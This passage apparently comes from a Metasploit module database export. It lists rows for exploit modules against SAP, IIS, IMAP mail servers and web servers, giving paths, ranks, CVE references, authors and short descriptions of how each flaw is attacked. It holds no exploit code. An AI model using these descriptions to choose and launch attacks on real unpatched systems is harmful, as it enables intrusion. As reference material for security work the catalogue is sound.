This module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.","Metasploit Framework License (BSD)","f","2012-11-01 00:00:00",0,,"aggressive","t","EDB-24996, OSVDB-92704, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Andras Kabai, Dmitry Chastuhin" 844,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_host_control_cmd_exec.rb","exploit","windows/http/sap_host_control_cmd_exec","exploit/windows/http/sap_host_control_cmd_exec","SAP NetWeaver HostControl Command Injection",200,"This module exploits a command injection vulnerability in the SAPHostControl Service, by sending a specially crafted SOAP request to the management console. In order to deal with the spaces and length limitations, a WebDAV service is created to run an arbitrary payload when accessed as a UNC path. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2012-08-14 00:00:00",0,,"passive","t","OSVDB-84821, URL-http://www.contextis.com/research/blog/sap4/, URL-https://websmp130.sap-ag.de/sap/support/notes/1341333","Michael Jordon, juan vazquez " 845,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb","exploit","windows/http/sap_mgmt_con_osexec_payload","exploit/windows/http/sap_mgmt_con_osexec_payload","SAP Management Console OSExecute Payload Execution",600,"This module executes an arbitrary payload through the SAP Management Console SOAP Interface. 
A valid username and password must be provided.","Metasploit Framework License (BSD)","t","2011-03-08 00:00:00",0,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 846,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sapdb_webtools.rb","exploit","windows/http/sapdb_webtools","exploit/windows/http/sapdb_webtools","SAP DB 7.4 WebTools Buffer Overflow",500,"This module exploits a stack buffer overflow in SAP DB 7.4 WebTools. By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-07-05 00:00:00",0,,"aggressive","t","BID-24773, CVE-2007-3614, OSVDB-37838","MC " 847,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/savant_31_overflow.rb","exploit","windows/http/savant_31_overflow","exploit/windows/http/savant_31_overflow","Savant 3.1 Web Server Overflow",500,"This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the ""ord"" payloads is recommended.","Metasploit Framework License (BSD)","f","2002-09-10 00:00:00",0,,"aggressive","t","BID-5686, CVE-2002-1120, EDB-787, OSVDB-9829","patrick " 848,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/servu_session_cookie.rb","exploit","windows/http/servu_session_cookie","exploit/windows/http/servu_session_cookie","Rhinosoft Serv-U Session Cookie Buffer Overflow",400,"This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5. 
By sending a specially crafted POST request with an overly long session cookie string, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-11-01 00:00:00",1,,"aggressive","t","CVE-2009-4006, OSVDB-59772, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html, URL-http://rangos.de/ServU-ADV.txt","M.Yanagishita , Nikolas Rangos , jduck " 849,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/shoutcast_format.rb","exploit","windows/http/shoutcast_format","exploit/windows/http/shoutcast_format","SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",200,"This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.","Metasploit Framework License (BSD)","f","2004-12-23 00:00:00",,,"aggressive","t","BID-12096, CVE-2004-1373, OSVDB-12585","MC , mandragore " 850,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/shttpd_post.rb","exploit","windows/http/shttpd_post","exploit/windows/http/shttpd_post","SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)",200,"This module exploits a stack buffer overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. 
Based on an original exploit by skOd but using a different method found by hdm.","Metasploit Framework License (BSD)","f","2006-10-06 00:00:00",,,"aggressive","t","BID-20393, CVE-2006-5216, OSVDB-29565, URL-http://shttpd.sourceforge.net","LMH , hdm , skOd" 851,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb","exploit","windows/http/solarwinds_storage_manager_sql","exploit/windows/http/solarwinds_storage_manager_sql","Solarwinds Storage Manager 5.1.0 SQL Injection",600,"This module exploits a SQL injection found in Solarwinds Storage Manager login interface. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious executable under the context of SYSTEM.","Metasploit Framework License (BSD)","f","2011-12-07 00:00:00",0,,"passive","t","EDB-18818, OSVDB-81634, URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html, URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm","muts, r , sinn3r " 852,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb","exploit","windows/http/sonicwall_scrutinizer_sqli","exploit/windows/http/sonicwall_scrutinizer_sqli","Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",600,"This module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. 
Please note that authentication is NOT needed to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-07-22 00:00:00",0,,"aggressive","t","BID-54625, CVE-2012-2962, EDB-20033, OSVDB-84232, URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf","Devon Kearns, muts, sinn3r " 853,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/steamcast_useragent.rb","exploit","windows/http/steamcast_useragent","exploit/windows/http/steamcast_useragent","Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",200,"This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending an overly long User-Agent in an HTTP GET request, an attacker may be able to execute arbitrary code.","BSD License","f","2008-01-24 00:00:00",1,,"aggressive","t","BID-33898, CVE-2008-0550, OSVDB-42670, URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt","LSO , patrick " 854,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sws_connection_bof.rb","exploit","windows/http/sws_connection_bof","exploit/windows/http/sws_connection_bof","Simple Web Server Connection Header Buffer Overflow",300,"This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string in the Connection header to cause a stack buffer overflow when vsprintf() is called, and gain arbitrary code execution. 
The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-07-20 00:00:00",0,,"aggressive","t","EDB-19937, OSVDB-84310, URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/","juan vazquez , mr.pr0n" 855,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sybase_easerver.rb","exploit","windows/http/sybase_easerver","exploit/windows/http/sybase_easerver","Sybase EAServer 5.2 Remote Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable.","Metasploit Framework License (BSD)","f","2005-07-25 00:00:00",,,"aggressive","t","BID-14287, CVE-2005-2297, OSVDB-17996","Unknown" 856,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sysax_create_folder.rb","exploit","windows/http/sysax_create_folder","exploit/windows/http/sysax_create_folder","Sysax Multi Server 5.64 Create Folder Buffer Overflow",300,"This module exploits a stack buffer overflow in the create folder function in Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the vulnerability valid credentials with the create folder permission must be provided. The HTTP option must be enabled on Sysax too. This module will log into the server, get a SID token, find the root folder, and then proceed to exploit the server. Successful exploits result in SYSTEM access. 
This exploit works on XP SP3, and Server 2003 SP1-SP2.","Metasploit Framework License (BSD)","t","2012-07-29 00:00:00",0,,"aggressive","t","EDB-18420, EDB-20676, OSVDB-82329, URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html, URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html","Craig Freyman, Matt ""hostess"" Andreko" 857,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/trackercam_phparg_overflow.rb","exploit","windows/http/trackercam_phparg_overflow","exploit/windows/http/trackercam_phparg_overflow","TrackerCam PHP Argument Buffer Overflow",200,"This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12592, CVE-2005-0478, OSVDB-13953, OSVDB-13955, URL-http://aluigi.altervista.org/adv/tcambof-adv.txt","hdm " 858,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/trendmicro_officescan.rb","exploit","windows/http/trendmicro_officescan","exploit/windows/http/trendmicro_officescan","Trend Micro OfficeScan Remote Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges).","Metasploit Framework License (BSD)","f","2007-06-28 00:00:00",0,,"aggressive","t","CVE-2008-1365, OSVDB-42499","toto" 859,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/umbraco_upload_aspx.rb","exploit","windows/http/umbraco_upload_aspx","exploit/windows/http/umbraco_upload_aspx","Umbraco CMS Remote Command Execution",600,"This module can be used to execute a payload on Umbraco CMS 4.7.0.378. 
The payload is uploaded as an ASPX script by sending a specially crafted SOAP request to codeEditorSave.asmx, which permits unauthorised file upload via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory. The module writes, executes and then overwrites an ASPX script; note that though the script content is removed, the file remains on the target. Automatic cleanup of the file is intended if a meterpreter payload is used. This module has been tested successfully on Umbraco CMS 4.7.0.378 on Windows 7 32-bit SP1. In this scenario, the ""IIS APPPOOL\ASP.NET v4.0"" user must have write permissions on the Windows Temp folder.","Metasploit Framework License (BSD)","f","2012-06-28 00:00:00",0,,"aggressive","t","URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html, URL-http://umbraco.codeplex.com/workitem/18192","Toby Clarke, juan vazquez " 860,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/webster_http.rb","exploit","windows/http/webster_http","exploit/windows/http/webster_http","Webster HTTP Server GET Buffer Overflow",200,"This exploits a stack buffer overflow in the Webster HTTP server. 
The server and source code were released within an article from the Microsoft Systems Journal in February 1996 titled ""Write a Simple HTTP-based Server Using MFC and Windows Sockets"".","Metasploit Framework License (BSD)","f","2002-12-02 00:00:00",0,,"aggressive","t","BID-6289, CVE-2002-2268, OSVDB-44106, URL-http://www.microsoft.com/msj/archive/s25f.aspx, URL-http://www.netdave.com/webster/webster.htm","patrick " 861,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/xampp_webdav_upload_php.rb","exploit","windows/http/xampp_webdav_upload_php","exploit/windows/http/xampp_webdav_upload_php","XAMPP WebDAV PHP Upload",600,"This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.","Metasploit Framework License (BSD)","f","2012-01-14 00:00:00",0,,"aggressive","t",,"theLightCosine " 862,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/xitami_if_mod_since.rb","exploit","windows/http/xitami_if_mod_since","exploit/windows/http/xitami_if_mod_since","Xitami 2.5c2 Web Server If-Modified-Since Overflow",200,"This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","f","2007-09-24 00:00:00",0,,"aggressive","t","BID-25772, CVE-2007-5067, EDB-4450, OSVDB-40594, OSVDB-40595","patrick " 863,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb","exploit","windows/http/zenworks_assetmgmt_uploadservlet","exploit/windows/http/zenworks_assetmgmt_uploadservlet","Novell ZENworks Asset Management Remote Execution",600,"This module exploits a path traversal flaw in Novell ZENworks Asset Management 7.5. 
By exploiting the CatchFileServlet, an attacker can upload a malicious file outside of the MalibuUploadDirectory and then make a secondary request that allows for arbitrary code execution.","Metasploit Framework License (BSD)","t","2011-11-02 00:00:00",0,,"aggressive","t","BID-50966, CVE-2011-2653, OSVDB-77583, URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-342/","Unknown, juan vazquez " 864,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/zenworks_uploadservlet.rb","exploit","windows/http/zenworks_uploadservlet","exploit/windows/http/zenworks_uploadservlet","Novell ZENworks Configuration Management Remote Execution",600,"This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0. By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory and then make a secondary request that allows for arbitrary code execution.","Metasploit Framework License (BSD)","t","2010-03-30 00:00:00",0,,"aggressive","t","BID-39114, OSVDB-63412, URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html, URL-http://www.novell.com/support/kb/doc.php?id=7005573, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-078/","MC " 865,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/iis_webdav_upload_asp.rb","exploit","windows/iis/iis_webdav_upload_asp","exploit/windows/iis/iis_webdav_upload_asp","Microsoft IIS WebDAV Write Access Code Execution",600,"This module can be used to execute a payload on IIS servers that have world-writeable directories. 
The payload is uploaded as an ASP script using a WebDAV PUT request.","Metasploit Framework License (BSD)","f","1994-01-01 00:00:00",0,,"aggressive","t","BID-12141, OSVDB-397","hdm " 866,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_023_printer.rb","exploit","windows/iis/ms01_023_printer","exploit/windows/iis/ms01_023_printer","Microsoft IIS 5.0 Printer Host Header Overflow",400,"This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.","Metasploit Framework License (BSD)","f","2001-05-01 00:00:00",0,,"aggressive","t","BID-2674, CVE-2001-0241, MSB-MS01-023, OSVDB-3323, URL-http://seclists.org/lists/bugtraq/2001/May/0005.html","hdm " 867,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_026_dbldecode.rb","exploit","windows/iis/ms01_026_dbldecode","exploit/windows/iis/ms01_026_dbldecode","Microsoft IIS/PWS CGI Filename Double Decode Command Execution",600,"This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. 
NOTE: This module will leave a metasploit payload in the IIS scripts directory.","Metasploit Framework License (BSD)","f","2001-05-15 00:00:00",0,,"aggressive","t","BID-2708, CVE-2001-0333, MSB-MS01-026, OSVDB-556, URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2","jduck " 868,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_033_idq.rb","exploit","windows/iis/ms01_033_idq","exploit/windows/iis/ms01_033_idq","Microsoft IIS 5.0 IDQ Path Overflow",400,"This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server.","Metasploit Framework License (BSD)","f","2001-06-18 00:00:00",0,,"aggressive","t","BID-2880, CVE-2001-0500, MSB-MS01-033, OSVDB-568","MC " 869,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms02_018_htr.rb","exploit","windows/iis/ms02_018_htr","exploit/windows/iis/ms02_018_htr","Microsoft IIS 4.0 .HTR Path Overflow",400,"This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. 
The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.","BSD License","t","2002-04-10 00:00:00",0,,"aggressive","t","BID-307, CVE-1999-0874, MSB-MS02-018, OSVDB-3325, URL-http://www.eeye.com/html/research/advisories/AD19990608.html","stinko " 870,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms02_065_msadc.rb","exploit","windows/iis/ms02_065_msadc","exploit/windows/iis/ms02_065_msadc","Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",300,"This module can be used to execute arbitrary code on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service. The service is exploitable even when RDS is configured to deny remote connections (handsafe.reg). The service is vulnerable to a heap overflow where the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.","Metasploit Framework License (BSD)","f","2002-11-20 00:00:00",0,,"aggressive","t","BID-6214, CVE-2002-1142, MSB-MS02-065, OSVDB-14502, URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html","patrick " 871,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb","exploit","windows/iis/ms03_007_ntdll_webdav","exploit/windows/iis/ms03_007_ntdll_webdav","Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",500,"This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. 
It should have a reasonable chance of success against any service pack.","Metasploit Framework License (BSD)","f","2003-05-30 00:00:00",0,,"aggressive","t","BID-7116, CVE-2003-0109, MSB-MS03-007, OSVDB-4467","hdm " 872,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/msadc.rb","exploit","windows/iis/msadc","exploit/windows/iis/msadc","Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution",600,"This module can be used to execute arbitrary commands on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service, using VbBusObj or AdvancedDataFactory to inject shell commands into Microsoft Access databases (MDBs), MSSQL databases and ODBC/JET Data Source Names (DSNs). Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively used in the wild in the late Nineties. MDAC versions affected include MDAC 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS installed, typically NT4 Servers with the NT Option Pack installed or upgraded 2000 systems running IIS 3/4/5; however, some vulnerable installations can still be found on newer Windows operating systems. Note that newer releases of msadcs.dll can still be abused; however, by default remote connections to RDS are denied. Consider using VERBOSE if you're unable to successfully execute a command, as the error messages are detailed and useful for debugging. 
Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique.","Metasploit Framework License (BSD)","f","1998-07-17 00:00:00",0,,"aggressive","t","BID-529, CVE-1999-1011, MSB-MS98-004, MSB-MS99-025, OSVDB-272","patrick " 873,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/eudora_list.rb","exploit","windows/imap/eudora_list","exploit/windows/imap/eudora_list","Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",500,"This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!","Metasploit Framework License (BSD)","t","2005-12-20 00:00:00",0,,"aggressive","t","BID-15980, CVE-2005-4267, OSVDB-22097","MC , jduck " 874,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/imail_delete.rb","exploit","windows/imap/imail_delete","exploit/windows/imap/imail_delete","IMail IMAP4D Delete Overflow",200,"This module exploits a buffer overflow in the 'DELETE' command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14.","Metasploit Framework License (BSD)","t","2004-11-12 00:00:00",0,,"aggressive","t","BID-11675, CVE-2004-1520, OSVDB-11838","spoonm " 875,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/ipswitch_search.rb","exploit","windows/imap/ipswitch_search","exploit/windows/imap/ipswitch_search","Ipswitch IMail IMAP SEARCH Buffer Overflow",200,"This module exploits a stack buffer overflow in the Ipswitch IMail Server 2006.1 IMAP SEARCH verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. 
In order for this module to be successful, the IMAP user must have at least one message.","Metasploit Framework License (BSD)","t","2007-07-18 00:00:00",0,,"aggressive","t","BID-24962, CVE-2007-3925, OSVDB-36219","MC " 876,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_login.rb","exploit","windows/imap/mailenable_login","exploit/windows/imap/mailenable_login","MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow",500,"MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.","Metasploit Framework License (BSD)","t","2006-12-11 00:00:00",0,,"aggressive","t","BID-21492, CVE-2006-6423, OSVDB-32125, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html","MC " 877,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_status.rb","exploit","windows/imap/mailenable_status","exploit/windows/imap/mailenable_status","MailEnable IMAPD (1.54) STATUS Request Buffer Overflow",500,"MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code.","Metasploit Framework License (BSD)","t","2005-07-13 00:00:00",0,,"aggressive","t","BID-14243, CVE-2005-2278, OSVDB-17844, URL-http://www.nessus.org/plugins/index.php?view=single&id=19193","MC " 878,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_w3c_select.rb","exploit","windows/imap/mailenable_w3c_select","exploit/windows/imap/mailenable_w3c_select","MailEnable IMAPD W3C Logging Buffer Overflow",500,"This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. 
MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.","Metasploit Framework License (BSD)","t","2005-10-03 00:00:00",0,,"aggressive","t","BID-15006, CVE-2005-3155, OSVDB-19842","MC " 879,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mdaemon_cram_md5.rb","exploit","windows/imap/mdaemon_cram_md5","exploit/windows/imap/mdaemon_cram_md5","Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",500,"This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts.","BSD License","t","2004-11-12 00:00:00",0,,"aggressive","t","BID-11675, CVE-2004-1520, OSVDB-11838","Unknown" 880,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mdaemon_fetch.rb","exploit","windows/imap/mdaemon_fetch","exploit/windows/imap/mdaemon_fetch","MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",500,"This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli","Metasploit Framework License (BSD)","f","2008-03-13 00:00:00",0,,"aggressive","t","BID-28245, CVE-2008-1358, EDB-5248, OSVDB-43111","Jacopo Cervini, patrick " 881,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercur_imap_select_overflow.rb","exploit","windows/imap/mercur_imap_select_overflow","exploit/windows/imap/mercur_imap_select_overflow","Mercur v5.0 IMAP SP3 SELECT Buffer Overflow",200,"Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. 
Credit to Tim Taylor for discovering the vulnerability.","BSD License","t","2006-03-17 00:00:00",0,,"aggressive","t","BID-17138, CVE-2006-1255, OSVDB-23950","Jacopo Cervini " 882,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercur_login.rb","exploit","windows/imap/mercur_login","exploit/windows/imap/mercur_login","Mercur Messaging 2005 IMAP Login Buffer Overflow",200,"This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.","Metasploit Framework License (BSD)","t","2006-03-17 00:00:00",0,,"aggressive","t","BID-17138, CVE-2006-1255, OSVDB-23950, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html","MC " 883,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercury_login.rb","exploit","windows/imap/mercury_login","exploit/windows/imap/mercury_login","Mercury/32 <= 4.01b LOGIN Buffer Overflow",200,"This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. 
This vulnerability was discovered by (mu-b at digit-labs.org).","Metasploit Framework License (BSD)","t","2007-03-06 00:00:00",0,,"aggressive","t","CVE-2007-1373, OSVDB-33883","MC " 884,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercury_rename.rb","exploit","windows/imap/mercury_rename","exploit/windows/imap/mercury_rename","Mercury/32 v4.01a IMAP RENAME Buffer Overflow",200,"This module exploits a stack buffer overflow vulnerability in the Mercury/32 v.4.01a IMAP service.","Metasploit Framework License (BSD)","t","2004-11-29 00:00:00",,,"aggressive","t","BID-11775, CVE-2004-1211, OSVDB-12508, URL-http://www.nessus.org/plugins/index.php?view=single&id=15867","MC " 885,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_append.rb","exploit","windows/imap/novell_netmail_append","exploit/windows/imap/novell_netmail_append","Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21723, CVE-2006-6425, OSVDB-31362, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-054.html","MC " 886,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_auth.rb","exploit","windows/imap/novell_netmail_auth","exploit/windows/imap/novell_netmail_auth","Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. 
Using the PAYLOAD of windows/shell_bind_tcp or windows/shell_reverse_tcp allows for the most reliable results.","Metasploit Framework License (BSD)","t","2007-01-07 00:00:00",0,,"aggressive","t","OSVDB-55175, URL-http://www.w00t-shell.net/","MC " 887,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_status.rb","exploit","windows/imap/novell_netmail_status","exploit/windows/imap/novell_netmail_status","Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2005-11-18 00:00:00",0,,"aggressive","t","BID-15491, CVE-2005-3314, OSVDB-20956","MC " 888,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_subscribe.rb","exploit","windows/imap/novell_netmail_subscribe","exploit/windows/imap/novell_netmail_subscribe","Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21728, CVE-2006-6761, OSVDB-31360, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454","MC " 